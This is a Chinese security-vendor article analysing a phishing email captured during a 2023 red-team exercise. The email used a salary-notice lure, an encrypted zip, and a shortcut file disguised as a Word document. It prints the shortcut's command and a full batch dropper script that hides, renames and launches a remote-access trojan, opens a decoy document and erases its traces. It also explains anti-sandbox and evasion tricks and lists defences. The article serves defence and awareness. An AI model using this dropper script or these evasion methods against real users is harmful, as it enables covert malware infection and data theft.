【年度典型案例】诡计多端!攻防演练中攻击队的神秘布局 - 嘶吼 RoarTalk – 网络安全行业综合服务平台,4hou.com

【年度典型案例】诡计多端!攻防演练中攻击队的神秘布局

CACTER 行业 2024-05-22 15:18:43
44315
收藏

导语:揭秘攻击队病毒邮件攻击手法及企业防护策略!

随着网络安全的重要性日益得到重视,网络安全实战攻防演练日益普及,其规模与覆盖面均逐年增长。

在攻防演练中,攻击方非常热衷于通过钓鱼、病毒邮件进行“打点”,利用远控木马获取目标企业员工终端权限,从而打开渗透企业内网的突破口。

真实案例分析

这是2023年某大型网络安全攻防演练中Coremail捕获到的来自攻击队的真实邮件。邮件以员工最关心薪酬通知为话题,引诱用户打开附件。攻击队还注册了近似的域名进行域名仿冒,以迷惑用户。

图片 1.png

附件为一个加密压缩包,通过加密的方式防止邮件安全网关反病毒查杀。解压后为一个快捷方式文件和一个隐藏文件夹。

图片 2.png

注意!windows lnk文件默认不显示后缀的特性,使其看起来非常像一个doc文档。

图片 3.png

用户一旦打开此快捷方式文件,就会执行以下命令:

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c ".\__M\.DOCX\copy.bat" && exit

图片 4.png

命令执行的结果就是运行隐藏文件夹中的 Copy.bat 脚本。Copy.bat脚本执行的内容如下:

cmd /c xcopy /h /y %cd%\__M\.DOCX\DS %temp%\

attrib -s -a -h %temp%\DS

rename %temp%\DS sihost.exe

attrib -s -a -h %cd%\__M\.DOCX\DS

del "%cd%\__M\.DOCX\DS"

attrib -s -a -h %cd%\__M\.DOCX\copy.bat

del *.lnk

copy %cd%\__M\.DOCX\员工工资变动申请表.doc %cd%\员工工资变动申请表.doc

start %cd%\员工工资变动申请表.doc

start %temp%\sihost.exe

del /s /q /f %0

Copy.bat脚本功能是把同文件夹下的DS文件拷贝到临时文件夹并重命名为ihost.exe,并且运行。ihost.exe是最终的恶意载荷,是一个远控木马,也做了免杀处理。运行木马后,bat脚本将删除DS和lnk文件,以清理痕迹,同时打开一个无害的doc文档,以便迷惑用户。

最终用户在完全不知情的情况下被植入了远控木马,攻击者利用远控密码可以持续监听用户口令以及查看用户本地文件。

攻击手法分析

01、话题吸睛

攻击队病毒邮件往往使用“薪酬通知”“安全监测工具”“实名举报”等吸引人的话题,引诱员工打开附件。

02、加密压缩

加密压缩是攻击队最喜欢的免杀方式,这种方式简单有效,可以绕过大部分杀毒引擎的查杀。

03、通过多文件相互调用反沙箱

此案例中的病毒附件由多个文件相互调用,lnk、bat文件均不带有恶意载荷,DS文件运行前没有后缀。攻击队通过这样的组合,使得每个单一文件在沙箱中均不会报毒。

04、多重伪装

结合了近似域名仿冒、lnk文件伪装doc文件、ihost.exe伪装系统进程等多种方式混淆视听,避免被用户察觉。

防护方案

·使用CACTER邮件安全网关的加密附件隔离审核功能,可以有效识别带有加密附件的邮件,可以对加密附件邮件进行隔离和审核。

·使用CACTER邮件安全网关的加密附件深度分析功能,可以从邮件正文智能提取解压口令,对附件进行解压后进一步进行查杀。

·定期开展钓鱼演练,对员工做好安全意识培训,提高员工的安全意识水平。

在网络安全攻防演练中,攻击方的策略和技巧不断演变,使得防御工作充满挑战。通过深入分析攻击手法并采取有效的防护措施,可以提高企业的网络安全防护能力。

如若转载,请注明原文地址
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论

 
本站4hou.com,所使用的字体和图片文字等素材部分来源于原作者或互联网共享平台。如使用任何字体和图片文字有侵犯其版权所有方的,嘶吼将配合联系原作者核实,并做出删除处理。
©2022 北京嘶吼文化传媒有限公司 京ICP备16063439号-1 本站由 提供云计算服务